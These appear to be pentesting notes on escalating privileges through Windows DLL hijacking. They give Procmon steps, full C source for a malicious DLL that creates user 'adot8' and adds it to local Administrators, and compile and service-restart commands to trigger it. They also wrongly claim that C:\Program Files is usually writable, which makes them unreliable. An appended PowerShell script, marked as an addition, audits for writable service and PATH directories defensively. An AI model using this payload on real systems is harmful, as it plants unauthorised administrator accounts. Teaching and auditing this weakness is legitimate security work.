DLL Hijacking

Overview

Dynamic Link Libraries (DLLs) are built like executables but cannot be run on their own. They are shared libraries containing functions, classes, resources, variables and so on, and they are loaded by executables at runtime.

When a Windows application or service starts up, it looks for the DLLs it needs. If a DLL it is looking for doesn't exist or is missing AND the directory it is searched in is writable, then we can get malicious with it.

Escalation via DLL Hijacking

Simulation Steps:

  • List running services and find one that sticks out

    Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}

  • Spin up Procmon

  • Filter menu > Filter > Process Name > is > <service binary>

  • Add filter of "Result is NAME NOT FOUND then Include"

  • Add filter of "Path ends with .dll then Include"

  • Restart the service

  • This will show all of the NAME NOT FOUND results for DLLs

  • We can exploit this if the location of the non-existent DLL is writable

  • C:\Program Files is usually writable

  • Start the service and see if it's looking for a DLL in a writable path

  • After one's been found, put a fake DLL there, make it call a malicious executable and pop a shell

In this case we can compile a malicious DLL payload from a C program and make the DLL add the user we're using to the local Administrators group, or pop a shell.

#include <stdlib.h>
#include <windows.h>

// Entry point the loader calls when the DLL is mapped into the service process.
BOOL APIENTRY DllMain(
    HANDLE hModule,             // Handle to DLL module
    DWORD  ul_reason_for_call,  // Reason for calling function
    LPVOID lpReserved)          // Reserved
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH: {  // A process is loading the DLL.
        // Braces are needed here: C does not allow a declaration directly after a case label.
        int i;
        i = system("net user adot8 password123! /add");
        i = system("net localgroup administrators adot8 /add");
        (void)i;
        break;
    }
    case DLL_THREAD_ATTACH:     // A process is creating a new thread.
        break;
    case DLL_THREAD_DETACH:     // A thread exits normally.
        break;
    case DLL_PROCESS_DETACH:    // A process unloads the DLL.
        break;
    }
    return TRUE;
}

x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll

Save to the writable location and restart the service

sc.exe stop dllsvc
sc.exe start dllsvc

OR check the directories on the search path for one that is writable:

$env:Path
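An added defensive check (example code, not from the original notes): the same search the Procmon steps above do by hand, expressed as a PowerShell audit that lists the service binary directories and PATH entries that low-privileged principals can write to. The function names Test-LowPrivWritable and Get-ServiceBinaryDir are this example's own, and it assumes Windows PowerShell 5.1 or later with English default principal names.

```powershell
# Added audit script (not part of the original notes). It walks the two places a
# service's missing DLL would be resolved from that a low-privileged user could
# control: the directory of each running service binary (searched first) and every
# %PATH% entry (searched last), and reports the ones such principals can write to.
# Assumed: Windows PowerShell 5.1+; principal names are the English defaults.

$lowPrivPrincipals = @('Everyone', 'BUILTIN\Users',
                       'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')

# Rights that allow dropping a file: the explicit file-system write bits plus the
# GENERIC_WRITE / GENERIC_ALL bits that inherit-only ACEs are often stored with.
$fsr = [System.Security.AccessControl.FileSystemRights]
$writeMask = [int]($fsr::Write -bor $fsr::Modify -bor $fsr::FullControl) -bor 0x40000000 -bor 0x10000000

function Test-LowPrivWritable {
    param([string]$Directory)
    if (-not (Test-Path -LiteralPath $Directory -PathType Container)) { return $false }
    $acl = Get-Acl -LiteralPath $Directory -ErrorAction SilentlyContinue
    if (-not $acl) { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($lowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band $writeMask) -ne 0) { return $true }
    }
    return $false
}

# Extract the executable from a PathName such as  "C:\Program Files\Vendor\svc.exe" -config x
# or  C:\Windows\system32\svchost.exe -k netsvcs  and return its directory.
function Get-ServiceBinaryDir {
    param([string]$PathName)
    if ($PathName -match '^"([^"]+)"') { $exe = $Matches[1] }
    else { $exe = ($PathName -split '\s+')[0] }
    return Split-Path -Parent $exe
}

$running = Get-CimInstance -ClassName Win32_Service |
           Where-Object { $_.State -eq 'Running' -and $_.PathName }
foreach ($svc in $running) {
    $dir = Get-ServiceBinaryDir $svc.PathName
    if (Test-LowPrivWritable $dir) {
        [pscustomobject]@{ Source = "service:$($svc.Name)"; Directory = $dir; RunsAs = $svc.StartName }
    }
}
foreach ($dir in ($env:Path -split ';' | Where-Object { $_ })) {
    if (Test-LowPrivWritable $dir) {
        [pscustomobject]@{ Source = 'PATH'; Directory = $dir; RunsAs = '(any process)' }
    }
}
```

Any row whose RunsAs is LocalSystem or another privileged account is the misconfiguration this page describes; fixing the directory ACL (or moving the binary out of a user-writable directory) removes the hijack opportunity.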
